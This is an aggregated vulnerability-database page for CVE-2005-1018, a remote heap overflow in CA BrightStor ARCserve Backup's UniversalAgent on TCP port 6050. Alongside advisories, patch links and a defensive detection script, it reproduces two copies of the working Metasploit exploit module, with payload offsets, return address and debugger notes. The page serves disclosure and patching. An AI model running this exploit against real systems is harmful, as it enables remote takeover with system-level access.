CVE-2005-1018
CVSS 7.5
Published: 2005-05-02 00:00:00
Revised: 2016-10-17 23:16:31

[Original] Buffer overflow in the UniversalAgent for Computer Associates (CA) BrightStor ARCserve Backup allows remote authenticated users to cause a denial of service or execute arbitrary code via an agent request to TCP port 6050 with a large argument before the option field.


[CNNVD] CA BrightStor ARCserve Backup UniversalAgent Buffer Overflow Vulnerability (CNNVD-200505-427)

        BrightStor ARCserve Backup provides backup and restore protection for all classes of Windows, NetWare, Linux and UNIX servers, as well as Windows, Mac OS X, Linux, UNIX, AS/400 and VMS client environments. The BrightStor software contains a buffer overflow in its implementation; a remote attacker could exploit it to execute arbitrary instructions on the host.

- CVSS (base score)

CVSS score: 7.5 [Severe (HIGH)]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (affected platforms and products)

Product and version information (CPE) not yet available

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1018
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-1018
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200505-427
(official data source) CNNVD

- Other links and resources

http://marc.info/?l=bugtraq&m=111351851802682&w=2
(UNKNOWN)  BUGTRAQ  20050414 Computer Associates BrightStor ARCserve Backup and BrightStor Enterprise Backup UniversalAgent buffer overflow vulnerability
http://www.idefense.com/application/poi/display?id=232&type=vulnerabilities
(UNKNOWN)  IDEFENSE  20050411 Computer Associates BrightStor ARCserve Backup UniversalAgent Buffer Overflow
http://www.securityfocus.com/archive/1/390760
(UNKNOWN)  BUGTRAQ  20050217 RE: BrightStor ARCserve Backup buffer overflow PoC (fixes available)
http://www.securityfocus.com/bid/13102
(UNKNOWN)  BID  13102

- Vulnerability information

CA BrightStor ARCserve Backup UniversalAgent Buffer Overflow Vulnerability
High severity  Buffer overflow
2005-05-02 00:00:00 2009-07-21 00:00:00
Remote
        BrightStor ARCserve Backup provides backup and restore protection for all classes of Windows, NetWare, Linux and UNIX servers, as well as Windows, Mac OS X, Linux, UNIX, AS/400 and VMS client environments. The BrightStor software contains a buffer overflow in its implementation; a remote attacker could exploit it to execute arbitrary instructions on the host.

- Advisories and patches

        The vendor has released patches that fix this security issue. Patch download links:
        Computer Associates BrightStor ARCserve Backup for Windows (All) 11.1
        Computer Associates APAR #: QO66526
        http://supportconnect.ca.com/sc/solcenter/solresults.jsp?aparno=QO66526&startsearch=1
        Computer Associates BrightStor ARCserve Backup for Windows (NoEng-All) 9.01
        Computer Associates APAR #: QO66529
        http://supportconnect.ca.com/sc/solcenter/solresults.jsp?aparno=QO66529&startsearch=1
        Computer Associates BrightStor ARCserve Backup for Windows (NoEng-Cli) 9.01
        Computer Associates APAR #: QO66531
        http://supportconnect.ca.com/sc/solcenter/solresults.jsp?aparno=QO66531&startsearch=1
        Computer Associates BrightStor ARCserve Backup for Windows (Eng-Cli) 9.01
        Computer Associates APAR #: QO66530
        http://supportconnect.ca.com/sc/solcenter/solresults.jsp?aparno=QO66530&startsearch=1
        Computer Associates BrightStor ARCserve Backup for Windows (Client) 11.1
        Computer Associates APAR #: QO66527
        http://supportconnect.ca.com/sc/solcenter/solresults.jsp?aparno=QO66527&startsearch=1
        Computer Associates BrightStor ARCserve Backup for Windows (Eng-All) 9.01
        Computer Associates APAR #: QO66528
        http://supportconnect.ca.com/sc/solcenter/solresults.jsp?aparno=QO66528&startsearch=1
        Computer Associates BrightStor Enterprise Backup 10.0
        Computer Associates APAR #: QO66523
        http://supportconnect.ca.com/sc/solcenter/solresults.jsp?aparno=QO66523&startsearch=1
        Computer Associates BrightStor Enterprise Backup for Windows 64 bit 10.5
        Computer Associates APAR #: QO66533
        http://supportconnect.ca.com/sc/solcenter/solresults.jsp?aparno=QO66533&startsearch=1
        Computer Associates BrightStor Enterprise Backup 10.5
        Computer Associates APAR #: QO66524
        http://supportconnect.ca.com/sc/solcenter/solresults.jsp?aparno=QO66524&startsearch=1
        Computer Associates BrightStor ARCServe Backup for Windows 64 bit 11.0
        Computer Associates APAR #: QO66535
        http://supportconnect.ca.com/sc/solcenter/solresults.jsp?aparno=QO66535&startsearch=1
        Computer Associates BrightStor ARCServe Backup for Windows 11.0
        Computer Associates APAR #: QO66525
        http://supportconnect.ca.com/sc/solcenter/solresults.jsp?aparno=QO66525&startsearch=1
        Computer Associates BrightStor ARCServe Backup for Windows 64 bit 11.1
        Computer Associates APAR #: QO66534
        http://supportconnect.ca.com/sc/solcenter/solresults.jsp?aparno=QO66534&startsearch=1
        Computer Associates BrightStor ARCServe Backup for Windows 64 bit 9.0.1
        Computer Associates APAR #: QO66536
        http://supportconnect.ca.com/sc/solcenter/solresults.jsp?aparno=QO66536&startsearch=1

- Vulnerability information (16405)

CA BrightStor Universal Agent Overflow (EDBID:16405)
windows remote
2010-06-22 Verified
0 metasploit
N/A [Download]
##
# $Id: universal_agent.rb 9583 2010-06-22 19:11:05Z todb $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'CA BrightStor Universal Agent Overflow',
			'Description'    => %q{
					This module exploits a convoluted heap overflow in the CA
				BrightStor Universal Agent service. Triple userland
				exception results in heap growth and execution of
				dereferenced function pointer at a specified address.
			},
			'Author'         => [ 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9583 $',
			'References'     =>
				[
					[ 'CVE', '2005-1018'],
					[ 'OSVDB', '15471' ],
					[ 'BID', '13102'],
					[ 'URL', 'http://www.idefense.com/application/poi/display?id=232&type=vulnerabilities'],
				],
			'Privileged'     => true,
			'Payload'        =>
				{
					# 250 bytes of space (bytes 0xa5 -> 0xa8 = reversed)
					'Space'    => 164,
					'BadChars' => "\x00",
					'StackAdjustment' => -3500,
				},
			'Targets'        =>
				[
					[
						'Magic Heap Target #1',
						{
							'Platform' => 'win',
							'Ret'      => 0x01625c44, # We grow to our own return address
						},
					],
				],
			'DisclosureDate' => 'Apr 11 2005',
			'DefaultTarget' => 0))

		register_options(
			[
				Opt::RPORT(6050)
			], self.class)
	end

	def exploit

		print_status("Trying target #{target.name}...")

		# The server reverses four bytes starting at offset 0xa5 :0

		# Create the overflow string
		boom = 'X' * 1024

		# Required field to trigger the fault
		boom[248, 2] = [1000].pack('V')

		# The shellcode, limited to 250 bytes (no nulls)
		boom[256, payload.encoded.length] = payload.encoded

		# This should point to itself
		boom[576, 4] = [target.ret].pack('V')

		# This points to the code below
		boom[580, 4] = [target.ret + 8].pack('V')

		# We have 95 bytes, use it to hop back to shellcode
		boom[584, 6] = "\x68" + [target.ret - 320].pack('V') + "\xc3"

		# Stick the protocol header in front of our request
		req = "\x00\x00\x00\x00\x03\x20\xa8\x02" + boom

		# We keep making new connections and triggering the fault until
		# the heap is grown to encompass our known return address. Once
		# this address has been allocated and filled, each subsequent
		# request will result in our shellcode being executed.

		1.upto(200) {|i|
			connect
			print_status("Sending request #{i} of 200...") if (i % 10) == 0
			sock.put(req)
			disconnect

			# Give the process time to recover from each exception
			select(nil,nil,nil,0.1);
		}

		handler
	end

end


__END__
012a0d91 8b8e445c0000     mov     ecx,[esi+0x5c44]
012a0d97 83c404           add     esp,0x4
012a0d9a 85c9             test    ecx,ecx
012a0d9c 7407             jz      ntagent+0x20da5 (012a0da5)
012a0d9e 8b11             mov     edx,[ecx]         ds:0023:41327441=???????
012a0da0 6a01             push    0x1
012a0da2 ff5204           call    dword ptr [edx+0x4]

Each request will result in another chunk being allocated, the exception
causes these chunks to never be freed. The large chunk size allows us to
predict the location of our buffer and grow our buffer to where we need it.

If these addresses do not match up, run this exploit, then attach with WinDbg:

> s 0 Lfffffff 0x44 0x5c 0x61 0x01

Figure out the pattern, replace the return address, restart the service,
and run it through again. Only tested on WinXP SP1

011b5c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
011c5c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
011d5c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
011e5c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
011f5c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
01205c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
[ snip ]
01605c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
01615c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
01625c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
01635c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
01645c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
01655c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
01665c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
01675c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
01685c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
01695c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
016a5c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
016b5c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
016c5c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
016d5c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
01725c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
017e5c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
		

- Vulnerability information (F83156)

CA BrightStor Universal Agent Overflow (PacketStormID:F83156)
2009-11-26 00:00:00
H D Moore  metasploit.com
exploit,overflow
CVE-2005-1018
[Download]

This Metasploit module exploits a convoluted heap overflow in the CA BrightStor Universal Agent service. Triple userland exception results in heap growth and execution of dereferenced function pointer at a specified address.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'CA BrightStor Universal Agent Overflow',
			'Description'    => %q{
				This module exploits a convoluted heap overflow in the CA
				BrightStor Universal Agent service. Triple userland
				exception results in heap growth and execution of
				dereferenced function pointer at a specified address.
					
			},
			'Author'         => [ 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2005-1018'],
					[ 'OSVDB', '15471' ],
					[ 'BID', '13102'],
					[ 'URL', 'http://www.idefense.com/application/poi/display?id=232&type=vulnerabilities'],

				],
			'Privileged'     => true,
			'Payload'        =>
				{
					# 250 bytes of space (bytes 0xa5 -> 0xa8 = reversed)
					'Space'    => 164,
					'BadChars' => "\x00",
					'StackAdjustment' => -3500,
				},
			'Targets'        => 
				[
					[ 
						'Magic Heap Target #1',
						{
							'Platform' => 'win',
							'Ret'      => 0x01625c44, # We grow to our own return address
						},
					],
				],
			'DisclosureDate' => '',
			'DefaultTarget' => 0))
			
			register_options(
				[
					Opt::RPORT(6050)
				], self.class)	
	end

	def exploit

		print_status("Trying target #{target.name}...")
			
		# The server reverses four bytes starting at offset 0xa5 :0

		# Create the overflow string
		boom = 'X' * 1024

		# Required field to trigger the fault
		boom[248, 2] = [1000].pack('V')
		
		# The shellcode, limited to 250 bytes (no nulls)
		boom[256, payload.encoded.length] = payload.encoded

		# This should point to itself
		boom[576, 4] = [target.ret].pack('V')
		
		# This points to the code below
		boom[580, 4] = [target.ret + 8].pack('V')

		# We have 95 bytes, use it to hop back to shellcode
		boom[584, 6] = "\x68" + [target.ret - 320].pack('V') + "\xc3"

		# Stick the protocol header in front of our request
		req = "\x00\x00\x00\x00\x03\x20\xa8\x02" + boom

		# We keep making new connections and triggering the fault until
		# the heap is grown to encompass our known return address. Once
		# this address has been allocated and filled, each subsequent
		# request will result in our shellcode being executed.

		1.upto(200) {|i|	
			connect
			print_status("Sending request #{i} of 200...") if (i % 10) == 0
			sock.put(req)
			disconnect

			# Give the process time to recover from each exception
			sleep(0.1);
		}
	
		handler
	end

end
	

__END__
012a0d91 8b8e445c0000     mov     ecx,[esi+0x5c44]
012a0d97 83c404           add     esp,0x4
012a0d9a 85c9             test    ecx,ecx
012a0d9c 7407             jz      ntagent+0x20da5 (012a0da5)
012a0d9e 8b11             mov     edx,[ecx]         ds:0023:41327441=???????
012a0da0 6a01             push    0x1
012a0da2 ff5204           call    dword ptr [edx+0x4]

Each request will result in another chunk being allocated, the exception
causes these chunks to never be freed. The large chunk size allows us to
predict the location of our buffer and grow our buffer to where we need it.

If these addresses do not match up, run this exploit, then attach with WinDbg:

> s 0 Lfffffff 0x44 0x5c 0x61 0x01

Figure out the pattern, replace the return address, restart the service,
and run it through again. Only tested on WinXP SP1

011b5c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
011c5c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
011d5c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
011e5c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
011f5c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
01205c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
[ snip ]
01605c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
01615c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
01625c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
01635c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
01645c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
01655c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
01665c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
01675c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
01685c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
01695c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
016a5c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
016b5c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
016c5c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
016d5c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
01725c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
017e5c44  48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc  H\b.L\b.........
    

- Vulnerability information (F37148)

iDEFENSE Security Advisory 2005-04-11.t (PacketStormID:F37148)
2005-04-18 00:00:00
iDefense Labs  idefense.com
advisory,remote,overflow,arbitrary
CVE-2005-1018
[Download]

iDEFENSE Security Advisory 04.11.05 - Remote exploitation of a buffer overflow vulnerability in Computer Associates International Inc's BrightStor ARCserve Backup UniversalAgent may allow attackers to execute arbitrary code.

Computer Associates BrightStor ARCserve Backup UniversalAgent Buffer Overflow

iDEFENSE Security Advisory 04.11.05
www.idefense.com/application/poi/display?id=232&type=vulnerabilities
April 11, 2005

I. BACKGROUND

BrightStor ARCserve Backup provides backup and restore protection for 
all classes of Windows, NetWare, Linux and UNIX servers, as well as 
Windows, Mac OS X, Linux, UNIX, AS/400 and VMS client environments.

II. DESCRIPTION

Remote exploitation of a buffer overflow vulnerability in Computer
Associates International Inc's BrightStor ARCserve Backup UniversalAgent
may allow attackers to execute arbitrary code.

The BrightStor software uses a network agent to perform backups on nodes
across the network. This agent service requires either administrative
credentials or a node-specific password and is capable of backing up
system settings as well as files. This agent will listen on TCP and UDP
ports 6050 by default.

When an agent request is received on the TCP port, with the "option" 
field set to 0, 3 or 1000, and a large string preceding this "option"
field in the packet, an overflow will occur. The agent software
includes its own exception handler, preventing the service from
actually crashing. Each time an exception occurs due to this overflow,
the handler will kick in and restore the service back to an operating
state. This particular overflow will cause three exceptions, two of
which are non-exploitable, and one which can be used to hijack
execution.

III. ANALYSIS

Successful exploitation of this vulnerability allows for a remote 
unauthenticated compromise with system level access. Although 
exploitation of this vulnerability is not trivial, it has been shown 
that it can be done reliably.

IV. DETECTION

Computer Associates BrightStor ARCserve Backup v11 (Win32) has been 
confirmed vulnerable.

V. WORKAROUND

Employ firewalls, access control lists or other TCP/UDP restriction 
mechanism to limit access to systems and services.

VI. VENDOR RESPONSE

Vendor advisories and patches for this vulnerability are available at:

BrightStor ARCserve Backup r11.1 for Windows (all components):
http://supportconnect.ca.com/sc/solcenter/solresults.jsp?aparno=QO66526&startsearch=1

BrightStor ARCserve Backup r11.1 Client Agent for Windows only:
http://supportconnect.ca.com/sc/solcenter/solresults.jsp?aparno=QO66527&startsearch=1

BrightStor ARCserve Backup r11.1 for Windows - 64 bit edition:
http://supportconnect.ca.com/sc/solcenter/solresults.jsp?aparno=QO66534&startsearch=1

BrightStor ARCserve Backup r11.0 for Windows:
http://supportconnect.ca.com/sc/solcenter/solresults.jsp?aparno=QO66525&startsearch=1

BrightStor ARCserve Backup r11.0 for Windows - 64 bit edition:
http://supportconnect.ca.com/sc/solcenter/solresults.jsp?aparno=QO66535&startsearch=1

BrightStor ARCserve Backup v9.01 for Windows English (all components):
http://supportconnect.ca.com/sc/solcenter/solresults.jsp?aparno=QO66528&startsearch=1

BrightStor ARCserve Backup v9.01 for Windows Non-English (all components):
http://supportconnect.ca.com/sc/solcenter/solresults.jsp?aparno=QO66529&startsearch=1

BrightStor ARCserve Backup v9.01 for Windows - 64 bit edition:
http://supportconnect.ca.com/sc/solcenter/solresults.jsp?aparno=QO66536&startsearch=1

BrightStor ARCserve Backup v9.01 Client Agent for Windows only (English):
http://supportconnect.ca.com/sc/solcenter/solresults.jsp?aparno=QO66530&startsearch=1

BrightStor ARCserve Backup v9.01 Client Agent for Windows only (Non-English):
http://supportconnect.ca.com/sc/solcenter/solresults.jsp?aparno=QO66531&startsearch=1

BrightStor Enterprise Backup v10.5 for Windows:
http://supportconnect.ca.com/sc/solcenter/solresults.jsp?aparno=QO66524&startsearch=1

BrightStor Enterprise Backup v10.5 for Windows - 64 bit edition:
http://supportconnect.ca.com/sc/solcenter/solresults.jsp?aparno=QO66533&startsearch=1

BrightStor Enterprise Backup v10.0 for Windows:
http://supportconnect.ca.com/sc/solcenter/solresults.jsp?aparno=QO66523&startsearch=1

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CAN-2005-1018 to this issue. This is a candidate for inclusion
in the CVE list (http://cve.mitre.org), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

12/02/2004 Initial vendor notification
12/02/2004 Initial vendor response
04/11/2005 Coordinated public disclosure

IX. CREDIT

The discoverer of this vulnerability wishes to remain anonymous.

Get paid for vulnerability research
http://www.idefense.com/poi/teams/vcp.jsp

Free tools, research and upcoming events
http://labs.idefense.com

X. LEGAL NOTICES

Copyright (c) 2005 iDEFENSE, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDEFENSE. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email customerservice@idefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.
    

- Vulnerability information

15471
CA BrightStor ARCserve Backup Universal Agent Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Patch / RCS
Exploit Commercial

- Vulnerability description

A remote overflow exists in ARCServe Backup. The Universal Agent fails to validate packets which are received on the TCP port, with the "option" field set to 0, 3 or 1000, and a large string preceding this "option" field in the packet, resulting in a buffer overflow. With a specially crafted request, an attacker can cause arbitrary code execution resulting in a loss of integrity.
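As an added defensive example (not code from this page, the iDefense advisory or Metasploit), the following Ruby triage heuristic decodes captured requests to the agent's TCP port 6050 using the layout inferred from the Metasploit module above (an 8-byte protocol header, then a body with the option field at offset 248; both are assumptions) and flags the trigger condition the advisory describes: a large, unterminated argument preceding an option value of 0, 3 or 1000. The 128-byte threshold and both sample requests are constructed.

```ruby
# Added example, not part of the page, the advisory or Metasploit. Offsets are
# assumptions taken from the module above; the agent protocol itself is not
# documented on the page, so treat them as a starting point for a signature.

AGENT_HEADER      = "\x00\x00\x00\x00\x03\x20\xa8\x02".b  # the module's 8-byte header
OPTION_OFFSET     = 248                  # assumed: boom[248, ...] in the module
TRIGGER_OPTIONS   = [0, 3, 1000].freeze  # option values named by the advisory
MAX_SANE_ARGUMENT = 128                  # assumed upper bound for a legitimate argument

# Decode the fields the heuristic needs. Returns nil for traffic that does not
# carry the agent header or is too short to hold an option field at all.
def parse_agent_request(raw)
  raw = raw.b
  return nil unless raw.start_with?(AGENT_HEADER)
  body = raw.byteslice(AGENT_HEADER.bytesize, raw.bytesize)
  return nil if body.bytesize < OPTION_OFFSET + 4

  # A well-formed argument is NUL-terminated; an overflow attempt fills the
  # whole field with printable filler and never terminates it.
  arg_field = body.byteslice(0, OPTION_OFFSET)
  nul       = arg_field.index("\x00".b)
  {
    argument_length: nul || OPTION_OFFSET,
    option:          body.byteslice(OPTION_OFFSET, 4).unpack1('V'),
    body_length:     body.bytesize,
  }
end

# True when the request matches the advisory's trigger: a large argument
# preceding an option field set to 0, 3 or 1000.
def suspicious_agent_request?(raw)
  info = parse_agent_request(raw)
  return false unless info
  TRIGGER_OPTIONS.include?(info[:option]) &&
    info[:argument_length] > MAX_SANE_ARGUMENT
end

# Summarise a batch of captured requests (client address => raw bytes, e.g.
# reassembled from a pcap) into one alert line per suspicious request.
def triage_agent_requests(captures)
  captures.each_with_object([]) do |(client, raw), alerts|
    next unless suspicious_agent_request?(raw)
    info = parse_agent_request(raw)
    alerts << "ALERT #{client}: option=#{info[:option]} " \
              "argument_length=#{info[:argument_length]} body=#{info[:body_length]}B"
  end
end

# Constructed samples: a plausible benign request, and one shaped like the
# module's request (filler only, no payload), to exercise the checks offline.
SAMPLE_BENIGN    = AGENT_HEADER + "C:\\Backup".b.ljust(OPTION_OFFSET, "\x00".b) +
                   [3].pack('V') + ("\x00".b * 16)
SAMPLE_OVERSIZED = AGENT_HEADER + ("X".b * OPTION_OFFSET) + [1000].pack('V') +
                   ("X".b * 100)

if __FILE__ == $PROGRAM_NAME
  puts triage_agent_requests("10.0.0.5" => SAMPLE_BENIGN, "10.0.0.9" => SAMPLE_OVERSIZED)
end
```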

- Timeline

2005-04-11 2004-12-02
Unknown Unknown

- Solution

Currently, there are no known workarounds or upgrades to correct this issue. However, Computer Associates has released a patch to address this vulnerability.

- References

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

Computer Associates BrightStor ARCserve Backup UniversalAgent Remote Buffer Overflow Vulnerability
Boundary Condition Error 13102
Yes No
2005-04-11 12:00:00 2009-07-13 04:26:00
Discovery is credited to an anonymous source.

- Affected program versions

Computer Associates BrightStor Enterprise Backup for Windows 64 bit 10.5
Computer Associates BrightStor Enterprise Backup 10.5
Computer Associates BrightStor Enterprise Backup 10.0
Computer Associates BrightStor ARCServe Backup for Windows 64 bit 11.1
Computer Associates BrightStor ARCServe Backup for Windows 64 bit 11.0
Computer Associates BrightStor ARCServe Backup for Windows 64 bit 9.0.1
Computer Associates BrightStor ARCserve Backup for Windows (NoEng-Cli) 9.01
Computer Associates BrightStor ARCserve Backup for Windows (NoEng-All) 9.01
Computer Associates BrightStor ARCserve Backup for Windows (Eng-Cli) 9.01
Computer Associates BrightStor ARCserve Backup for Windows (Eng-All) 9.01
Computer Associates BrightStor ARCserve Backup for Windows (Client) 11.1
Computer Associates BrightStor ARCserve Backup for Windows (All) 11.1
Computer Associates BrightStor ARCServe Backup for Windows 11.1
Computer Associates BrightStor ARCServe Backup for Windows 11.0
Computer Associates BrightStor ARCServe Backup for Windows 9.0 .0.1

- Vulnerability discussion

A remote buffer-overflow vulnerability affects BrightStor ARCserve and ARCserve Enterprise agent because the application fails to securely copy data from the network.

A remote attacker may exploit this issue to execute arbitrary code on a vulnerable computer, potentially facilitating unauthorized superuser access. A denial-of-service condition may arise as well.

BrightStor ARCserve Backup v11 for Win32 platforms is vulnerable; other versions may also be affected.

- Exploit

Exploit code is available as part of the Metasploit Framework:

- Solution

The vendor has released advisories and fixes. Please see the references for details.


Computer Associates BrightStor ARCserve Backup for Windows (All) 11.1

Computer Associates BrightStor ARCserve Backup for Windows (NoEng-All) 9.01

Computer Associates BrightStor ARCserve Backup for Windows (NoEng-Cli) 9.01

Computer Associates BrightStor ARCserve Backup for Windows (Eng-Cli) 9.01

Computer Associates BrightStor ARCserve Backup for Windows (Client) 11.1

Computer Associates BrightStor ARCserve Backup for Windows (Eng-All) 9.01

Computer Associates BrightStor Enterprise Backup 10.0

Computer Associates BrightStor Enterprise Backup for Windows 64 bit 10.5

Computer Associates BrightStor Enterprise Backup 10.5

Computer Associates BrightStor ARCServe Backup for Windows 64 bit 11.0

Computer Associates BrightStor ARCServe Backup for Windows 11.0

Computer Associates BrightStor ARCServe Backup for Windows 64 bit 11.1

Computer Associates BrightStor ARCServe Backup for Windows 64 bit 9.0.1

- References
